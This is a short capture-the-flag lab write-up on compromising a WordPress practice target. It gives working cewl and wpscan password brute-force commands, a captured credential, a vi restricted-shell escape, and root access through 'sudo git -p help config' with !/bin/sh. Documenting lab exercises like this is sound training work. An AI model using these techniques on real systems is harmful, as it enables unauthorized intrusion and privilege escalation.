1. scanned, found tcp/80 open
2. Found wordpress install
3. Found 3 usernames with wpscan. Was an old ver, could have exploited that.
4. Found hints recommending using cewl to aggregate a wordlist. Did so.
5. Did a wpscan attack using jerry with cewlwords.out and got a pass match. Jerry / adipiscing
cewl -d 2 -m 5 -w cewlwords.out http://target
wpscan –url http://192.168.100.194/index.php -P cewlwords.out threads 50 -U jerry
** Clues on the site said that a regular wordlist wouldn’t work to crack site but referenced ‘cewl’.
6. Logged into wordpress.
7. ssh-ed in as tom with this password found from cewl input.
8. su-ed to jerry with his pass.
9. did a weird vi shell trick to get root, found flag.
– open vi and hit :set shell=/bin/sh
– then enter :shell
– Dumps you to a restricted shell
– export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
– found a way on gtfobin to use git for privilege escalation.
– run sudo git -p help config and when the output stops we can type !/bin/sh to get us a root shell.